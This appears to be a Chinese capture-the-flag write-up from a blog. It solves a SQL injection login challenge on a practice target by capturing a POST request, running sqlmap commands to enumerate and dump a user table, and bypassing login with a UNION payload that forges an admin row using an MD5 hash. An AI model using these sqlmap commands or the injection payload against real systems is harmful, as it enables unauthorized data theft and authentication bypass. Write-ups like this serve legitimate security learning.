打开靶机
是一个登录框。右键看一下源码。
可以看到是以post方法传参。感觉像时间盲注。随便输入一个用户名和密码,然后bp抓包。
我们把这个页面全部复制,创建一个txt文件粘贴进去。
把这个文件托进kali里然后打开终端,用sqlmap扫描数据库。
命令:sqlmap -r /home/wz/桌面/2.txt --dbs
这个文件路径就输入你的路径。然后一路点y。
可以看到数据库为:information_schema和web_sqli。根据经验我们应该爆破第二个。命令为:
sqlmap -r /home/wz/桌面/2.txt -D web_sqli --tables
可以看到爆出的表名为:user。我们爆字段。
命令为:sqlmap -r /home/wz/桌面/2.txt -D web_sqli -T user --columns
然后我们爆数据。命令为:sqlmap -r /home/wz/桌面/2.txt -D web_sqli -T user -C id,passwd,username --dump
然后你会发现这个md5碰撞不出来。我们还得构造。
mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5;所以我们去哈希一下123得202cb962ac59075b964b07152d234b70。
我们payload: name=1'union select 1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123
最后放松一下眼睛。
![请添加图片描述](https://img-blog.csdnimg.cn/2052feaaf2184bdea3ed14a9450
图片是抖音@瞳瞳